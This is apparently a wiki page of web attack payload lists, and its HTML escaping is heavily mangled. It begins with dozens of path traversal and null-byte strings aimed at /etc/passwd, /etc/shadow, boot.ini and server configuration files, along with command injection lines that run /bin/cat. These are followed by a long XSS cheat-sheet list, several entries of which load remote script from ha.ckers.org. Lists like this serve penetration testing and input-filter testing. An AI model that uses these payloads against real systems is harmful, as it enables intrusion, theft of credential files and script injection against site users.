%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
